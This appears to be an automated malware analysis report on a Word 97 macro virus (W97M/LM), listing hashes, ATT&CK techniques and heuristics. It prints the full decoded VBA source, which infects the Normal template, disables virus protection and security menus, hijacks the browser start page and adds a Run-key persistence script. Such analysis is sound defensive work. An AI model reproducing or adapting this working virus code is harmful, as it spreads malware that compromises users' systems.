Office (OLE) malware analysis — malicious · b7cae5e9c38f0952

MALICIOUS

Office (OLE)

47.0 KB Created: 2000-06-13 13:25:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 8bd6bf3c4e3c97d45e3fed84f6601068 SHA-1: a0cf98fcf9a66b4d7b5663114f3de2316d46184b SHA-256: b7cae5e9c38f09527d43eba629e1a282404610fa760448a0504a6650cfc60447

110 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder

The sample contains a VBA macro that executes upon opening the document. This macro attempts to set the Internet Explorer start page to a specific URL and modifies registry keys related to system protection and user information. The macro also attempts to disable security prompts and virus protection, indicating a malicious intent to compromise the user's system or redirect their browsing.

Heuristics 5

Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call

Matched line in script

    Open "C:\Windows\System\LM.sys.vbs" For Output As #1
        Print #1, "Set MW = WScript.CreateObject(""Word.Application"")"
        Print #1, "MW.Options.VirusProtection = (Rnd * 0)"

Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro

Matched line in script

Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next

Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://www.geocities.com/sir_dystyk/index.html� In document text (OLE body)
- http://www.geocities.com/sir_In document text (OLE body)
- http://www.geocities.com/sir_dystyk/index.htmlIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3885 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	3885 bytes
SHA-256: `b24d4e7436d62e7dfb15e0c5745824bcfd38590f7ba267385d1d26d2b36c2413`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() On Error Resume Next If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "LM Protection by SiR DySTyK?") <> "Yep !!" Then System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\", "Start Page") = "http://www.geocities.com/sir_dystyk/index.html" With System .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "SiR DySTyK" .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "LVC" End With If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0) Else CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0) CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0) CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0) End If With Options .VirusProtection = (Rnd * 0) .SaveNormalPrompt = (Rnd * 0) .ConfirmConversions = (Rnd * 0) End With With Application .EnableCancelKey = wdCancelDisabled .UserName = "SiR DySTyK" .UserInitials = "SD" .UserAddress = "W97M/LM >8)" End With If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines) Set Destination = Infect.VBProject.VBComponents.Item(1).CodeModule Destination.DeleteLines 1, Destination.CountOfLines Destination.AddfromString Vx If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument Call RemoteInfect End If ' W97M/LM: by SiR DySTyK [© 2000, LVC] ' Should spread under Word2000. ' God made him simple. ' Science made him God. - [ Lawnmower Man >8) ] End Sub Private Sub HelpAbout() MsgBox "All I have to do is spread.." + Chr$(10) + " I WILL survive !! >8)" + Chr$(10) + Chr$(10) + " -SiR DySTyK-", vbInformation + vbSystemModal, "W97M/LM" Dialogs(wdDialogHelpAbout).Show End Sub Private Sub RemoteInfect() On Error Resume Next System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "") = "C:\Windows\System\LM.sys.vbs" Open "C:\Windows\System\LM.sys" For Output As #1 Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfDeclarationLines) Close #1 Open "C:\Windows\System\LM.sys.vbs" For Output As #1 Print #1, "Set MW = WScript.CreateObject(""Word.Application"")" Print #1, "MW.Options.VirusProtection = (Rnd * 0)" Print #1, "MW.Options.SaveNormalPrompt = (Rnd * 0)" Print #1, "MW.Options.ConfirmConversions = (Rnd * 0)" Print #1, "Set LM = MW.NormalTemplate.VBProject.VBComponents(1)" Print #1, "LM.CodeModule.DeleteLines 1, LM.CodeModule.CountOfLines" Print #1, "LM.CodeModule.AddFromFile (""C:\Windows\System\LM.sys"")" Close #1 End Sub

SHA-256: b24d4e7436d62e7dfb15e0c5745824bcfd38590f7ba267385d1d26d2b36c2413

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    On Error Resume Next
    
    If System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "LM Protection by SiR DySTyK?") <> "Yep !!" Then
        System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\", "Start Page") = "http://www.geocities.com/sir_dystyk/index.html"

        With System
            .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOwner") = "SiR DySTyK"
            .PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\", "RegisteredOrganization") = "LVC"
        End With
        
        If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Security\", "Level") <> "" Then
            CommandBars("Macro").Controls("Security...").Enabled = (Rnd * 0)
        Else
            CommandBars("Tools").Controls("Macro").Enabled = (Rnd * 0)
            CommandBars("Tools").Controls("Templates and Add-ins...").Enabled = (Rnd * 0)
            CommandBars("Format").Controls("Style Gallery...").Enabled = (Rnd * 0)
        End If
        
        With Options
            .VirusProtection = (Rnd * 0)
            .SaveNormalPrompt = (Rnd * 0)
            .ConfirmConversions = (Rnd * 0)
        End With
        
        With Application
            .EnableCancelKey = wdCancelDisabled
            .UserName = "SiR DySTyK"
            .UserInitials = "SD"
            .UserAddress = "W97M/LM   >8)"
        End With
        
        If ThisDocument = ActiveDocument Then Set Infect = NormalTemplate Else Set Infect = ActiveDocument
        
        Vx = ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfLines)
        
        Set Destination = Infect.VBProject.VBComponents.Item(1).CodeModule
        Destination.DeleteLines 1, Destination.CountOfLines
        Destination.AddfromString Vx
        
        If Infect = ActiveDocument Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument
        
        Call RemoteInfect
End If
' W97M/LM: by SiR DySTyK [© 2000, LVC]
' Should spread under Word2000.
' God made him simple.
' Science made him God. - [ Lawnmower Man   >8) ]
End Sub
Private Sub HelpAbout()
    MsgBox "All I have to do is spread.." + Chr$(10) + "   I WILL survive !!   >8)" + Chr$(10) + Chr$(10) + "  -SiR DySTyK-", vbInformation + vbSystemModal, "W97M/LM"
    Dialogs(wdDialogHelpAbout).Show
End Sub
Private Sub RemoteInfect()
    On Error Resume Next
    
    System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\", "") = "C:\Windows\System\LM.sys.vbs"
    
    Open "C:\Windows\System\LM.sys" For Output As #1
        Print #1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, ThisDocument.VBProject.VBComponents.Item(1).CodeModule.CountOfDeclarationLines)
    Close #1
    Open "C:\Windows\System\LM.sys.vbs" For Output As #1
        Print #1, "Set MW = WScript.CreateObject(""Word.Application"")"
        Print #1, "MW.Options.VirusProtection = (Rnd * 0)"
        Print #1, "MW.Options.SaveNormalPrompt = (Rnd * 0)"
        Print #1, "MW.Options.ConfirmConversions = (Rnd * 0)"
        Print #1, "Set LM = MW.NormalTemplate.VBProject.VBComponents(1)"
        Print #1, "LM.CodeModule.DeleteLines 1, LM.CodeModule.CountOfLines"
        Print #1, "LM.CodeModule.AddFromFile (""C:\Windows\System\LM.sys"")"
    Close #1
End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.